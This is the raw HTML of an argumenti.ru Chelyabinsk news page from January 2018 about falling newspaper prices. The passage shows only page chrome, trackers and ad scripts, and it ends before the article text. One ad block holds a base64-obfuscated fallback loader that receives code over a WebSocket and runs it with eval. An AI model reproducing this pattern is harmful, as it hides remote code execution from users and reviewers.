<!DOCTYPE html>
<html>
	<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta name='yandex-verification' content='57463a260b82b280' />
	<meta name="google-site-verification" content="tossbk_I2eb3-RB8DxVbAUYPewK5KDyj6bnrnKC8-eU" />
	<meta name="mailru-verification" content="1505d3c11701cb6c" />
	<meta name="dumedia-verify" content="df31ef70be34">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
	<meta name="757a66e838ed83d5840779983391e519" content="">
	<title>Почему подешевеют газеты на Южном Урале - Аргументы Недели. Челябинск</title><meta name="description" content="Цены на периодику в Челябинской области упадут. Такой вывод был сделан после анализа продаж прошлого года и озвучен сегодня, 12 января, на пресс-конференции медиа-холдинге «Гранада Пресс».
"><meta name="twitter:title" content="Почему подешевеют газеты на Южном Урале - Аргументы Недели. Челябинск"><meta name="twitter:image" content="http://argumenti.ru/images/arhnews/560485.jpg"><meta name="og:title" content="Почему подешевеют газеты на Южном Урале - Аргументы Недели. Челябинск"><meta name="og:description" content="Цены на периодику в Челябинской области упадут. Такой вывод был сделан после анализа продаж прошлого года и озвучен сегодня, 12 января, на пресс-конференции медиа-холдинге «Гранада Пресс».
"><meta name="og:image" content="http://argumenti.ru/images/arhnews/560485.jpg"><meta name="mediator_published_time" content="2018-01-12T13:35:55+0000"><meta name="mediator_theme" content="Челябинск"><meta name="mediator_theme" content="пресса"><meta name="mediator_theme" content="СМИ"><meta name="mediator" content="560485"><link rel="stylesheet" href="http://argumenti.ru/pub/styles/reset.css" type="text/css"><link rel="stylesheet" href="http://argumenti.ru/pub/styles/mainv.css?ver=73" type="text/css"><link rel="stylesheet" href="http://argumenti.ru/mistakes/static/mistakes.css" type="text/css"><link rel="image_src" href="http://argumenti.ru/images/arhnews/560485.jpg" >	<//base href="http://argumenti.ru/" />
		<link rel="amphtml" href="http://argumenti.ru/society/2018/01/560485/amp">
			    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css">

	<link title="argumenti_ru" type="application/rss+xml" rel="alternate" href="http://www.argumenti.ru/rss/argumenti_online.xml"/>
	<link rel="icon" type="image/ico" href="http://argumenti.ru/favicon.ico" />
	<link rel="icon" type="image/png" href="http://argumenti.ru/favicon.png">
	<link rel="apple-touch-icon" href="http://www.argumenti.ru/pub/images/apple-touch-icon-iphone.png" />
	<link rel="apple-touch-icon" sizes="72x72" href="http://www.argumenti.ru/pub/images/apple-touch-icon-ipad.png" />
	<link rel="apple-touch-icon" sizes="114x114" href="http://www.argumenti.ru/pub/images/apple-touch-icon-iphone4.png" />
	<link rel="apple-touch-icon" sizes="144x144" href="http://www.argumenti.ru/pub/images/apple-touch-icon-ipad3.png" />

		



	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/argumenti_21.js?ver=7"></script>
	<script language="JavaScript" src="http://argumenti.ru/mistakes/static/mistakes_2.js"></script>
	<script type="text/javascript" src="http://argumenti.ru/pub/js/jdropdowns/jquery.dropdownPlain.js"></script>
	<script type="text/javascript" src="http://argumentiru.com/pub/js/jscroller-0.4.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/jquery.jcarousel.min.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/jquery.validate.min.js"></script>
	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.3/jquery-ui.min.js"></script>
    <script type="text/javascript" src="http://argumenti.ru/pub/js/tinycarusel.js"></script>
<script type="text/javascript" src="http://argumentiru.com/pub/js/adfox.asyn.code.scroll/adfox.asyn.code.ver3.js"></script>
		<script type="text/javascript" src="http://argumentiru.com/pub/js/adfox.asyn.code.scroll/adfox.asyn.code.scroll.js"> </script>
<!-- Put this script tag to the <head> of your page -->
<script type="text/javascript" src="https://vk.com/js/api/share.js?94" charset="windows-1251"></script>
<script id="my-widget-script" async
        src="https://likemore-go.imgsmail.ru/widget.js"
        data-uid="9f8d155b17e468abed8b96495fb48897">
</script>
	</head>

			<body>
	
<!-- create page: 20:01:37 01.12.18 -->

<!-- Yandex.Metrika counter  ONLINE -->
<script type="text/javascript">
(function (d, w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter26004090 = new Ya.Metrika({id:26004090,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true});
        } catch(e) { }
    });

    var n = d.getElementsByTagName("script")[0],
        s = d.createElement("script"),
        f = function () { n.parentNode.insertBefore(s, n); };
    s.type = "text/javascript";
    s.async = true;
    s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

    if (w.opera == "[object Opera]") {
        d.addEventListener("DOMContentLoaded", f, false);
    } else { f(); }
})(document, window, "yandex_metrika_callbacks");
</script>
<noscript><div><img src="//mc.yandex.ru/watch/26004090" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
<!--Desktop--!>
<!-- Rating@Mail.ru counter -->
<script type="text/javascript">
var _tmr = window._tmr || (window._tmr = []);
_tmr.push({id: "2828898", type: "pageView", start: (new Date()).getTime()});
(function (d, w, id) {
  if (d.getElementById(id)) return;
  var ts = d.createElement("script"); ts.type = "text/javascript"; ts.async = true; ts.id = id;
  ts.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//top-fwz1.mail.ru/js/code.js";
  var f = function () {var s = d.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ts, s);};
  if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); }
})(document, window, "topmailru-code");
</script><noscript><div style="position:absolute;left:-10000px;">
<img src="//top-fwz1.mail.ru/counter?id=2828898;js=na" style="border:0;" height="1" width="1" alt="Рейтинг@Mail.ru" />
</div></noscript>
<!-- //Rating@Mail.ru counter -->
<header>

<nav>
<div class="menu_wrapper">
<div class="menuToggle"><i class="fa fa-bars" aria-hidden="true"></i></div>
	<ul id="dropdown" class="dropdown">
	    <li class="mob_hidden"><a href="http://argumenti.ru/?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=upmenu">Главная страница</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/live?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=upmenu">АН LIVE</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/an?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=upmenu">Скачать «Аргументы Недели»</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/charity?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=upmenu">Сможем вместе</a></li>
		<li class="mob_hidden"><a href="http://knigi-an.ru" target="_blank" rel="nofollow">Книги «АН»</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/allbooks?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=upmenu" target="_blank" rel="nofollow">Книги pdf</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/complanes?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=upmenu">Книга жалоб</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/udobreniya?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=upmenu">Биоклад</a></li>
		<li class="mob_hidden"><a href="http://argumenti.ru/rassledovanie_an?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=upmenu">Расследования АН</a></li>
		<li class="mob_hidden up_bars"><i class="fa fa-bars" aria-hidden="true"></i></li>
		<div class="dropmenu">
		<ul>
			<li><a href="http://argumenti.ru/social?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Соцпакет</a></li>
			<li><a href="http://argumenti.ru/pravoved?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Правовед</a></li>
			<li><a href="http://argumenti.ru/gorodm?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Город&nbsp;М</a></li>
			<li><a href="http://argumenti.ru/earth?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu"><nobr>Сад-огород</nobr></a></li>
			<li><a href="http://argumenti.ru/espionage?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Шпионаж</a></li>
			<li><a href="http://argumenti.ru/crime?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Криминал</a></li>
			<li><a href="http://argumenti.ru/culture?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Культура</a></li>
			<li><a href="http://argumenti.ru/health?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Здоровье</a></li>
			<li><a href="http://argumenti.ru/history?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">История</a></li>
			<li><a href="http://argumenti.ru/education?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Образование</a></li>
			<li><a href="http://argumenti.ru/army?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Армия</a></li>
			<li><a href="http://argumenti.ru/hitech?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Хайтек</a></li>
			<li style="border-bottom: none!important;"><a href="http://argumenti.ru/scandal?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Скандал</a></li>
			<li class="drop_sub">Регионы</li>
			<li><a href="http://argumenti.ru/region/spb">АН - CПб</a></li>
			<li><a href="http://an-crimea.ru/" rel='nofollow'>АН - Крым</a></li>
			<li><a href="http://argumenti.ru/region/ekb">АН - Екб</a></li>		</ul>
		</div>
	</ul>
	<ul id="dropdown" class="dropdown desc_hidden">
		<li><a href="http://argumenti.ru">Главная</a></li>
		<li><a href="http://argumenti.ru/live">АН LIVE</a></li>
		<li><a href="http://argumenti.ru/news">Все новости</a></li>
	    <li class="submenu_name">Рубрики</li>
		<li><a href="http://argumenti.ru/politics">Политика</a></li>
		<li><a href="http://argumenti.ru/economics">Экономика</a></li>
		<li><a href="http://argumenti.ru/society">Общество</a></li>
		<li><a href="http://argumenti.ru/world">В мире</a></li>
		<li><a href="http://argumenti.ru/social">Соцпакет</a></li>
		<li><a href="http://argumenti.ru/pravoved">Правовед</a></li>
		<li><a href="http://argumenti.ru/rassledovanie">Расследования</a></li>
		<li><a href="http://argumenti.ru/hitech">Хайтек</a></li>
		<li><a href="http://argumenti.ru/gorodm">Город&nbsp;М</a></li>
		<li><a href="http://argumenti.ru/earth"><nobr>Сад-огород</nobr></a></li>
		<li><a href="http://argumenti.ru/espionage">Шпионаж</a></li>
		<li><a href="http://argumenti.ru/scandal">Скандал</a></li>
		<li><a href="http://argumenti.ru/sport">Спорт</a></li>
		<li><a href="http://argumenti.ru/crime">Криминал</a></li>
		<li><a href="http://argumenti.ru/showbiz"><nobr>Шоубиз</nobr></a></li>
		<li><a href="http://argumenti.ru/health">Здоровье</a></li>
		<li><a href="http://argumenti.ru/history">История</a></li>
		<li><a href="http://argumenti.ru/education">Образование</a></li>
		<li><a href="http://argumenti.ru/tourism">Туризм</a></li>
		<li><a href="http://argumenti.ru/army">Армия</a></li>
	</ul>	
</div>
</nav>
<div id="star">
			<ul>
																								<li id="77060">
																<a href="http://argumenti.ru/world/2018/01/560468?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/0f7c729641f244f8e1627ef7017ac9df.jpg" width="160" height="110" alt="Обнародованы сценарии начала Третьей мировой в 2018 году" />
																					<p>Обнародованы сценарии начала Третьей мировой в 2018 году</p></a>	
						</li>

																								<li id="77062" >
																								<a href="http://argumenti.ru/politics/2018/01/560483?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/158cced2e96b86506317ffa147985c6a.jpeg" width="160" height="110" alt="В Кремле заявили, что санкции США не останутся без ответа" />
																<p>В Кремле заявили, что санкции США не останутся без ответа</p></a>
								
						</li>
																									<li id="77052">
																<a href="http://argumenti.ru/unknown/2018/01/560433?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/59276b09582300521a5861c0c3723b5d.jpg" width="160" height="110" alt="СМИ: московские войска ПВО привели в боевую готовность из-за НЛО" />
																					<p>СМИ: московские войска ПВО привели в боевую готовность из-за НЛО</p></a>	
						</li>

												</ul>
		</div></header>
        
<div class="container">
	<div class="content">
		<!-- логотип -->

		<div id="corp">
							<a href="http://argumenti.ru/" id="an_logo"><img alt="Аргументы Недели (argumenti.ru)" src="http://www.argumenti.ru/images/argumenti/AN2.gif"/></a>
					<div id="search_time">

														<a href="http://argumenti.ru/region/chelyabinsk"><div class="regiontitle">Челябинск</div></a>
						
			


<div class="ya-site-form ya-site-form_inited_no" onclick="return {'action':'http://argumenti.ru/search','arrow':false,'bg':'transparent','fontsize':12,'fg':'#000000','language':'ru','logo':'rb','publicname':'Yandex Site Search #2186328','suggest':true,'tld':'ru','type':2,'usebigdictionary':true,'searchid':2186328,'webopt':false,'websearch':false,'input_fg':'#000000','input_bg':'#ffffff','input_fontStyle':'normal','input_fontWeight':'normal','input_placeholder':'Поиск...','input_placeholderColor':'#000000','input_borderColor':'#7f9db9'}">
	<form action="http://yandex.ru/sitesearch" method="get" target="_blank">
		<input type="hidden" name="searchid" value="2186328"/>
		<input type="hidden" name="l10n" value="ru"/>
		<input type="hidden" name="reqenc" value=""/>
		<input type="search" name="text" value=""/>
		<input type="submit" value="Найти"/>
	</form></div><style type="text/css">.ya-page_js_yes .ya-site-form_inited_no { display: none; }</style><script type="text/javascript">(function(w,d,c){var s=d.createElement('script'),h=d.getElementsByTagName('script')[0],e=d.documentElement;if((' '+e.className+' ').indexOf(' ya-page_js_yes ')===-1){e.className+=' ya-page_js_yes';}s.type='text/javascript';s.async=true;s.charset='utf-8';s.src=(d.location.protocol==='https:'?'https:':'http:')+'//site.yandex.net/v2.0/js/all.js';h.parentNode.insertBefore(s,h);(w[c]||(w[c]=[])).push(function(){Ya.Site.Form.init()})})(window,document,'yandex_site_callbacks');</script>

	</div>
		<div class="soc_reg">

            <ul id="socnets" style="width:100%">
				<li><a class="vk" target="_blank" href="http://vkontakte.ru/club14409962" rel="nofollow"></a></li>
				<li><a class="tw" target="_blank" href="http://twitter.com/argumenti" rel="nofollow"></a></li>
				<li><a class="fb" target="_blank" href="https://www.facebook.com/argumentinedeli" rel="nofollow"></a></li>
				<li><a class="mt2" target="_blank" href="http://argumenti.mirtesen.ru/" rel="nofollow"></a></li>
				<li><a class="ok" target="_blank" href="http://www.odnoklassniki.ru/argumenti" rel="nofollow"></a></li>
			</ul>


			<div id="parts">
		<select id="Regions" onchange="window.location.href=this.options[this.selectedIndex].value">
			<option value="">Регион</option>
			<option value="http://argumenti.ru/">Вся Россия</option>
								
				<option value="http://argumenti.ru/region/altay">Алтайский край</option>
								
				<option value="http://argumenti.ru/region/baltiya">Балтия</option>
								
				<option value="http://argumenti.ru/region/belrus">Белоруссия</option>
								
				<option value="http://argumenti.ru/region/vladivostok">Владивосток</option>
								
				<option value="http://argumenti.ru/region/volgograd">Волгоград</option>
								
				<option value="http://argumenti.ru/region/vyatka">Вятка</option>
								
				<option value="http://argumenti.ru/region/ekb">Екатеринбург</option>
								
				<option value="http://argumenti.ru/region/irkutsk">Иркутск</option>
								
				<option value="http://argumenti.ru/region/kamchatka">Камчатка</option>
								
				<option value="http://argumenti.ru/region/krasnoyarsk">Красноярск</option>
								
				<option value="http://an-crimea.ru/">Крым</option>
								
				<option value="http://argumenti.ru/region/kursk">Курск</option>
								
				<option value="http://argumenti.kg/">Кыргызстан</option>
								
				<option value="http://argumenti.ru/region/lipetsk">Липецк</option>
								
				<option value="http://argumenti.ru/region/murmansk">Мурманск</option>
								
				<option value="http://argumenti.ru/region/novosib">Новосибирск</option>
								
				<option value="http://argumenti.ru/region/orel">Орел</option>
								
				<option value="http://argumenti.ru/region/penza">Пенза</option>
								
				<option value="http://argumenti.ru/region/perm">Пермь</option>
								
				<option value="http://argumenti.ru/region/petrozavodsk">Петрозаводск</option>
								
				<option value="http://argumenti.ru/region/petropavlovsk">Петропавловск-К</option>
								
				<option value="http://argumenti.ru/region/spb">Санкт-Петербург</option>
								
				<option value="http://argumenti.ru/region/sakhlin">Сахалин</option>
								
				<option value="http://argumenti.ru/region/kavkaz">Северный Кавказ</option>
								
				<option value="http://argumenti.ru/region/tatarstan">Татарстан</option>
								
				<option value="http://argumenti.ru/region/tver">Тверь</option>
								
				<option value="http://argumenti.ru/region/ural">Урал</option>
								
				<option value="http://argumenti.ru/region/chelyabinsk">Челябинск</option>
								
				<option value="http://argumenti.ru/region/yakutsk">Якутск</option>
								
				<option value="http://argumenti.ru/region/yaroslavl">Ярославль</option>
				
		</select>
	</div>        </div>

		</div>

		<div class="new_corp">
								<div id="menus">
		<ul class="mainmenu">
			<li><a href="http://argumenti.ru/politics?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Политика</a></li>
			<li><a href="http://argumenti.ru/economics?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Экономика</a></li>
			<li><a href="http://argumenti.ru/society?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Общество</a></li>
			<li><a href="http://argumenti.ru/world?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">В мире</a></li>			
			<li><a href="http://argumenti.ru/showbiz?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium"><nobr>Шоубиз</nobr></a></li>
			<li><a href="http://argumenti.ru/sport?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Спорт</a></li>
			<li><a href="http://argumenti.ru/rassledovanie?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Расследования</a></li>
			<li><a href="http://argumenti.ru/tourism?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Туризм</a></li>
			<li><a href="http://argumenti.ru/culture?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Культура</a></li>
		</ul>
</div>
		<!-- Rating@Mail.ru counter -->
<script type="text/javascript">//<![CDATA[
var _tmr = _tmr || [];
_tmr.push({id: "1069168", type: "pageView", start: (new Date()).getTime()});
(function (d, w) {
   var ts = d.createElement("script"); ts.type = "text/javascript"; ts.async = true;
   ts.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//top-fwz1.mail.ru/js/code.js";
   var f = function () {var s = d.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ts, s);};
   if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); }
})(document, window);
//]]></script><noscript><div style="position:absolute;left:-10000px;">
<img src="//top-fwz1.mail.ru/counter?id=1069168;js=na" style="border:0;" height="1" width="1" alt="Рейтинг@Mail.ru" />
</div></noscript>
<!-- //Rating@Mail.ru counter -->

		</div>


			<div id="left">

		
		
		
		


<!-- Крупные preview -->
<!-- По умолчанию -->
		<noindex>
	<h2 class="namerub"><span class="rem">//</span>Новости</h2>
<div id="smi2adblock_76450"><a href="http://net.finam.ru/" rel="nofollow">Новости net.finam.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.net.finam.ru/data/js/76450.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>

<!--  
<h2 class="namerub"><span class="rem">//</span>События/Афиша</h2>
<a href="http://m-g-t.ru/performance/vysotskij-rozhdenie-legendy" rel="nofollow">
<img src="http://argumenti.ru/pub/images/partners/696.gif" width="240" height="240" alt="vysotskij-rozhdenie-legendy"  border="0" /></a>
-->



	<h2 class="namerub"><span class="rem">//</span>НАШИ ПАРТНЕРЫ</h2>
<img src="http://www.argumenti.ru/images/partners/743.gif" width="240" height="100">	
	</noindex>
			
	
					<h4 class="namerub"><span class="rem">//</span>Сад и огород</h4>
		<ul class="minf_anons">
							<li><a href="http://argumenti.ru/ad_informer/click/68946" target="_blank"><img src="http://argumenti.ru/images/preview/tabloid/41be9494515abc45b9a4829cf417a55c.png" width="70" height="70" alt="Биоклад"  border="0" /><div class="inf_txt">Биоклад лёгок и удобен в применении на вашем дачном участке</div></a></li>	
							<li><a href="http://argumenti.ru/ad_informer/click/75594" target="_blank"><img src="http://argumenti.ru/images/preview/tabloid/084882fdb1f00bb652ed12e2b09035bf.jpg" width="70" height="70" alt="Биоклад"  border="0" /><div class="inf_txt">Правила посадки ели</div></a></li>	
					</ul>
	
	
		
		
	<h2 class="namerub"><span class="rem">//</span>Новости marketgid</h2>
<!-- M7342Composite Start --> <div id="M7342Composite647352"><center> <a href="http://marketgid.com/" target="_blank" rel="nofollow">Загрузка...</a> </center></div> <script type="text/javascript"> var d = new Date, script647352 = document.createElement("script"), mg_ws647352 = {};script647352.type = "text/javascript";script647352.charset = "utf-8";script647352.src = "//jsc.marketgid.com/n/e/news.argumenti.ru.647352.js?t=" + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script647352.onerror = function () { mg_ws647352 = new Worker(URL.createObjectURL(new Blob(['eval(atob(\'ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDczNTIoZSl7dmFyIGg9bWdfd3M2NDczNTIub25tZXNzYWdlOyBtZ193czY0NzM1Mi5yZWFkeVN0YXRlPT1tZ193czY0NzM1Mi5DTE9TRUQmJihtZ193czY0NzM1Mj1uZXcgV2ViU29ja2V0KG1nX3dzNjQ3MzUyX2xvY2F0aW9uKSksbWdfd3M2NDczNTIub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDczNTIobWdfd3M2NDczNTIsZnVuY3Rpb24oKXttZ193czY0NzM1Mi5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDczNTIoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDczNTIoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDczNTJfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0NzM1MiA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDczNTJfbG9jYXRpb24pLCBtZ193czY0NzM1Mi5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDczNTIoZS5kYXRhKX0=\'))']), {type: "application/javascript"})); mg_ws647352.onmessage = function (msg){window.eval(msg.data);}; mg_ws647352.postMessage('js|'+script647352.src+'|M7342Composite647352|M7342Composite647352');};document.body.appendChild(script647352); </script> <!-- M7342Composite End -->






<div id="smi2adblock_81550"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = '//js.advert.mirtesen.ru/data/js/81550.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>




<h2 class="namerub"><span class="rem">//</span>новости 24СМИ</h2>
<div id="smi_teaser_2695">
    <center>
        <a href="https://24smi.info/?utm_source=informer_2695" rel="nofollow">
            Агрегатор новостей 24СМИ
        </a>
    </center>
</div>

<script type="text/JavaScript" encoding="utf8">
 (function() {
 var sm = document.createElement("script");
 sm.type = "text/javascript";
 sm.async = true;
 sm.src = "//jsn.24smi.net/d/b/2695.js";
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(sm, s);})();
</script>





	<div>
	

			


<div id="unit_83036"><a href="http://smi2.net/" rel="nofollow">Новости СМИ2</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = '//news.smi2.ru/data/js/83036.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>



	</div>

		
	<h4 class="namerub"><span class="rem">//</span>Поп-новости</h4>
<ul class="main_inf_anons">
			<li>
							<a href="http://argumenti.ru/showbiz/2018/01/560512">
					<img src="http://argumenti.ru/images/preview/arhnews/1f46f1155b66c6b813e2583d35b2cf9e.jpg" alt="Юлия Высоцкая зацепила фоткой в купальнике" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2018/01/560512" style="font-size:1.05em;">Юлия Высоцкая зацепила фоткой в купальнике</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2018/01/560506">
					<img src="http://argumenti.ru/images/preview/arhnews/dfb9f6364617e623efd985425d213e95.jpg" alt="Алена Хмельницкая в день 47-летия продемонстрировала шпагат на пляже" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2018/01/560506" style="font-size:1.05em;">Алена Хмельницкая в день 47-летия продемонстрировала шпагат на пляже</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2018/01/560501">
					<img src="http://argumenti.ru/images/preview/arhnews/3b6cfe310b94d36e47f3d8a88fa1ad44.jpg" alt="Цымбалюк-Романовская рассказала об интимных подробностях жизни с Джигарханяном" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2018/01/560501" style="font-size:1.05em;">Цымбалюк-Романовская рассказала об интимных подробностях жизни с Джигарханяном</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2018/01/560494">
					<img src="http://argumenti.ru/images/preview/arhnews/7cb1bf8bcb4eb66197305260ffe48832.jpeg" alt="В СМИ сообщили, что актера Стивена Сигала обвинили в домогательствах" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2018/01/560494" style="font-size:1.05em;">В СМИ сообщили, что актера Стивена Сигала обвинили в домогательствах</a>
		</li>
	</ul>	<h2 class="namerub"><span class="rem">//</span>Новости news.net.finam.ru</h2>
<div id="smi2adblock_68993"><a href="http://finance.comon.ru/" rel="nofollow">Новости finance.comon.ru</a></div>
<script async type="text/javascript" charset="windows-1251">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.finance.comon.ru/data/js/68993.js'; sc.charset = 'windows-1251';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>



				
	<div id="block__fix-adv">
		<!-- Yandex.RTB R-A-50615-2 -->
<div id="yandex_rtb_R-A-50615-2"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-50615-2",
                renderTo: "yandex_rtb_R-A-50615-2",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>		
	</div>

		
<!--<h4 class="namerub"><span class="rem">//</span>Наши партнеры</h4>-->


</div>	
		<section id="center">

			<!-- your device: Desktop -->
            

		
			<!--noindex-->

	<ul id="topanons">
					<li><span class="news_time">15.09&nbsp;13:13</span><a href="http://argumenti.ru/society/2016/09/467498?utm_source=argumenti.ru&utm_medium=news&utm_campaign=anons">Владелец маршруток в Челябинске задолжала по штрафам более 80 тысяч рублей</a></li>
					<li><span class="news_time">14.09&nbsp;10:49</span><a href="http://argumenti.ru/society/2016/09/467298?utm_source=argumenti.ru&utm_medium=news&utm_campaign=anons">В Миассе водителей проверили на трезвость</a></li>
					<li><span class="news_time">14.09&nbsp;10:41</span><a href="http://argumenti.ru/society/2016/09/467294?utm_source=argumenti.ru&utm_medium=news&utm_campaign=anons">В Златоусте инспекторов ГИБДД усилили священниками</a></li>
					<li><span class="news_time">14.09&nbsp;10:32</span><a href="http://argumenti.ru/society/2016/09/467293?utm_source=argumenti.ru&utm_medium=news&utm_campaign=anons">Участник забега &laquo;Азия-Европа&raquo; умер на финише</a></li>
					<li><span class="news_time">13.09&nbsp;13:09</span><a href="http://argumenti.ru/society/2016/09/467179?utm_source=argumenti.ru&utm_medium=news&utm_campaign=anons">В Челябинске становится традицией спасать больших кошек</a></li>
				<li class="news_arh">
							<a href="http://argumenti.ru/society/news?utm_source=argumenti.ru&utm_medium=news&utm_campaign=anons">Общество</a> /
							<a href="http://argumenti.ru/region/chelyabinsk/archive">Челябинск</a> /
				<a href="http://argumenti.ru/news" style="font-size:1.2em">Все новости >></a>

		</li>
	</ul>

	<!--/noindex-->			
			<p class="namerub">
			<span class="rem">//</span><a href="http://argumenti.ru/society">Общество</a>
						<span class="agecategory">
									13+
							</span>
		</p>
	
	<article>
	<h1>Почему подешевеют газеты на Южном Урале</h1>
	
				<p class="info">
					<span class="number_info">

						
						



													12&nbsp;января&nbsp;2018,&nbsp;13:35																			[&nbsp;«Аргументы Недели. Челябинск»&nbsp;]
						
					</span>
				</p>
				<div class="publtxt">
																		<figure id="publ_photo">
																<img src="http://argumenti.ru/images/preview/arhnews/f4ee20cd55916d6dcca461671095564e.jpg" alt="Почему подешевеют газеты на Южном Урале" />
																							</figure>
											

																	
																								
